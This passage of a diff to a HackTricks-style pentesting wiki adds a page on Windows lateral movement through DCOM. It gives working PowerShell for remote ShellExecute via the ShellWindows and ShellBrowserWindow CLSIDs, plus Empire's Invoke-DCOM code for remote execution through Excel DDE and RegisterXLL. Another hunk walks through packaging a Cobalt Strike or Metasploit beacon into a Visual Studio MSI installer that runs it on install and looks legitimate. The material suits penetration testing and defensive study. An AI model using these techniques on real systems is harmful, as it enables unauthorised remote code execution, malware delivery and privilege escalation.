+The first object explored was [ShellWindows](https://msdn.microsoft.com/en-us/library/windows/desktop/bb773974\(v=vs.85\).aspx). Since there is no [ProgID](https://msdn.microsoft.com/en-us/library/windows/desktop/ms688254\(v=vs.85\).aspx) associated with this object, we can use the [Type.GetTypeFromCLSID](https://msdn.microsoft.com/en-us/library/system.type.gettypefromclsid\(v=vs.110\).aspx) .NET method paired with the[ Activator.CreateInstance](https://msdn.microsoft.com/en-us/library/system.activator.createinstance\(v=vs.110\).aspx) method to instantiate the object via its AppID on a remote host. In order to do this, we need to get the [CLSID](https://msdn.microsoft.com/en-us/library/windows/desktop/ms691424\(v=vs.85\).aspx) for the ShellWindows object, which can be accomplished using OleView .NET as well:
+
+![shellwindow\_classid](https://enigma0x3.files.wordpress.com/2017/01/shellwindow\_classid.png?w=434\&h=424)
+
+As you can see below, the “Launch Permission” field is blank, meaning no explicit permissions are set.
+
+![screen-shot-2017-01-23-at-4-12-24-pm](https://enigma0x3.files.wordpress.com/2017/01/screen-shot-2017-01-23-at-4-12-24-pm.png?w=455\&h=401)
+
+&#x20;Now that we have the CLSID, we can instantiate the object on a remote target:
+
+```powershell
+$com = [Type]::GetTypeFromCLSID("<clsid>", "<IP>") #9BA05972-F6A8-11CF-A442-00A0C90A8F39
+$obj = [System.Activator]::CreateInstance($com)
+```
+
+![](https://enigma0x3.files.wordpress.com/2017/01/remote\_instantiation\_shellwindows.png?w=690\&h=354)
+
+With the object instantiated on the remote host, we can interface with it and invoke any methods we want. The returned handle to the object reveals several methods and properties, none of which we can interact with. In order to achieve actual interaction with the remote host, we need to access the [WindowsShell.Item](https://msdn.microsoft.com/en-us/library/windows/desktop/bb773970\(v=vs.85\).aspx) method, which will give us back an object that represents the Windows shell window:
+
+```
+$item = $obj.Item()
+```
+
+![](https://enigma0x3.files.wordpress.com/2017/01/item\_instantiation.png?w=416\&h=465)
+
+With a full handle on the Shell Window, we can now access all of the expected methods/properties that are exposed. After going through these methods, **`Document.Application.ShellExecute`** stood out. Be sure to follow the parameter requirements for the method, which are documented [here](https://msdn.microsoft.com/en-us/library/windows/desktop/gg537745\(v=vs.85\).aspx).
+
+```powershell
+$item.Document.Application.ShellExecute("cmd.exe", "/c calc.exe", "c:\windows\system32", $null, 0)
+```
+
+![](https://enigma0x3.files.wordpress.com/2017/01/shellwindows\_command\_execution.png?w=690\&h=426)
+
+As you can see above, our command was executed on a remote host successfully.
+
+### ShellBrowserWindow
+
+This particular object does not exist on Windows 7, making its use for lateral movement a bit more limited than the “ShellWindows” object, which I tested on Win7-Win10 successfully.
+
+Based on my enumeration of this object, it appears to effectively provide an interface into the Explorer window just as the previous object does. To instantiate this object, we need to get its CLSID. Similar to above, we can use OleView .NET:
+
+![shellbrowser\_classid](https://enigma0x3.files.wordpress.com/2017/01/shellbrowser\_classid.png?w=428\&h=414)
+
+Again, take note of the blank Launch Permission field:
+
+![screen-shot-2017-01-23-at-4-13-52-pm](https://enigma0x3.files.wordpress.com/2017/01/screen-shot-2017-01-23-at-4-13-52-pm.png?w=399\&h=340)
+
+With the CLSID, we can repeat the steps taken on the previous object to instantiate the object and call the same method:
+
+```powershell
+$com = [Type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880", "<IP>")
+$obj = [System.Activator]::CreateInstance($com)
+
+$obj.Document.Application.ShellExecute("cmd.exe", "/c calc.exe", "C:\Windows\system32", $null, 0)
+```
+
+![](https://enigma0x3.files.wordpress.com/2017/01/shellbrowserwindow\_command\_execution.png?w=690\&h=441)
+
+As you can see, the command successfully executed on the remote target.
+
+Since this object interfaces directly with the Windows shell, we don’t need to invoke the “ShellWindows.Item” method, as on the previous object.
+
+While these two DCOM objects can be used to run shell commands on a remote host, there are plenty of other interesting methods that can be used to enumerate or tamper with a remote target. A few of these methods include:
+
+* `Document.Application.ServiceStart()`
+* `Document.Application.ServiceStop()`
+* `Document.Application.IsServiceRunning()`
+* `Document.Application.ShutDownWindows()`
+* `Document.Application.GetSystemInformation()`
+
+## ExcelDDE & RegisterXLL
+
+In a similar way it's possible to move laterally abusing DCOM Excel objects, for more information read [https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom](https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom)
+
+```powershell
+# Chunk of code from https://github.com/EmpireProject/Empire/blob/master/data/module_source/lateral_movement/Invoke-DCOM.ps1
+## You can see here how to abuse excel for RCE
+elseif ($Method -Match "DetectOffice") {
+    $Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
+    $Obj = [System.Activator]::CreateInstance($Com)
+    $isx64 = [boolean]$obj.Application.ProductCode[21]
+    Write-Host  $(If ($isx64) {"Office x64 detected"} Else {"Office x86 detected"})
+}
+elseif ($Method -Match "RegisterXLL") {
+    $Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
+    $Obj = [System.Activator]::CreateInstance($Com)
+    $obj.Application.RegisterXLL("$DllPath")
+}
+elseif ($Method -Match "ExcelDDE") {
+    $Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
+    $Obj = [System.Activator]::CreateInstance($Com)
+    $Obj.DisplayAlerts = $false
+    $Obj.DDEInitiate("cmd", "/c $Command")
+}
+```
+
+## Tool
+
+The Powershell script [**Invoke-DCOM.ps1**](https://github.com/EmpireProject/Empire/blob/master/data/module\_source/lateral\_movement/Invoke-DCOM.ps1) allows to easily invoke all the commented ways to execute code in other machines.
+
+## References
+
+* The first method was copied from [https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/](https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/), for more info follow the link
+* The second section was copied from [https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/](https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/), for more info follow the link
+
+<details>
+
+<summary><strong>Support HackTricks and get benefits!</strong></summary>
+
+Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+
+Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+
+Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+
+**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+
+**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+</details>

windows-hardening/ntlm/README.md

@@ -187,10 +187,9 @@ wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>
 
 ### Manual Windows remote execution with username and password
 
-* [**PsExec**](psexec-and-winexec.md)
-* [**SmbExec**](smbexec.md)
-* [**WmicExec**](wmicexec.md)
-* [**AtExec**](atexec.md)
+{% content-ref url="../lateral-movement/" %}
+[lateral-movement](../lateral-movement/)
+{% endcontent-ref %}
 
 ## Extracting credentials from a Windows Host
 

windows-hardening/windows-local-privilege-escalation/README.md

@@ -214,9 +214,9 @@ You can exploit this vulnerability using the tool [**WSUSpicious**](https://gith
 ## KrbRelayUp
 
 This is essentially a universal no-fix **local privilege escalation** in windows **domain** environments where **LDAP signing is not enforced,** where the **user has self rights** (to configure **RBCD**) and where the **user can create computers in the domain.**\
-\*\*\*\*All the requirements \*\*\*\* are satisfied with **default settings**.
+****All the **requirements** are satisfied with **default settings**.
 
-Find the **exploit in** [**https://github.com/Dec0ne/KrbRelayUp**](https://github.com/Dec0ne/KrbRelayUp)\*\*\*\*
+Find the **exploit in** [**https://github.com/Dec0ne/KrbRelayUp**](https://github.com/Dec0ne/KrbRelayUp)
 
 Even if the attack is For more information about the flow of the attack check [https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/](https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/)
 
@@ -262,6 +262,21 @@ Read this tutorial to learn how to create a MSI wrapper using this tools. Note t
 [create-msi-with-wix.md](create-msi-with-wix.md)
 {% endcontent-ref %}
 
+### Create MSI with Visual Studio
+
+* **Generate** with Cobalt Strike or Metasploit a **new Windows EXE TCP payload** in `C:\privesc\beacon.exe`
+* Open **Visual Studio**, select **Create a new project** and type "installer" into the search box. Select the **Setup Wizard** project and click **Next**.
+* Give the project a name, like **AlwaysPrivesc**, use **`C:\privesc`** for the location, select **place solution and project in the same directory**, and click **Create**.
+* Keep clicking **Next** until you get to step 3 of 4 (choose files to include). Click **Add** and select the Beacon payload you just generated. Then click **Finish**.
+* Highlight the **AlwaysPrivesc** project in the **Solution Explorer** and in the **Properties**, change **TargetPlatform** from **x86** to **x64**.
+  * There are other properties you can change, such as the **Author** and **Manufacturer** which can make the installed app look more legitimate.
+* Right-click the project and select **View > Custom Actions**.
+* Right-click **Install** and select **Add Custom Action**.
+* Double-click on **Application Folder**, select your **beacon.exe** file and click **OK**. This will ensure that the beacon payload is executed as soon as the installer is run.
+* Under the **Custom Action Properties**, change **Run64Bit** to **True**.
+* Finally, **build it**.
+  * If the warning `File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86'` is shown, make sure you set the platform to x64.
+
 ### MSI Installation
 
 To execute the **installation** of the malicious `.msi` file in **background:**
@@ -1481,6 +1496,7 @@ If you manages to **hijack a dll** being **loaded** by a **process** running as
 [**Watson**](https://github.com/rasta-mouse/Watson) -- Search for known privesc vulnerabilities (needs to be compiled using VisualStudio) ([**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/watson))\
 [**SeatBelt**](https://github.com/GhostPack/Seatbelt) -- Enumerates the host searching for misconfigurations (more a gather info tool than privesc) (needs to be compiled) **(**[**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)**)**\
 [**LaZagne**](https://github.com/AlessandroZ/LaZagne) **-- Extracts credentials from lots of softwares (precompiled exe in github)**\
+****[**SharpUP**](https://github.com/GhostPack/SharpUp) **-- Port of PowerUp to C#**\
 [~~**Beroot**~~](https://github.com/AlessandroZ/BeRoot) **\~\~**\~\~ -- Check for misconfiguration (executable precompiled in github). Not recommended. It does not work well in Win10.\
 [~~**Windows-Privesc-Check**~~](https://github.com/pentestmonkey/windows-privesc-check) -- Check for possible misconfigurations (exe from python). Not recommended. It does not work well in Win10.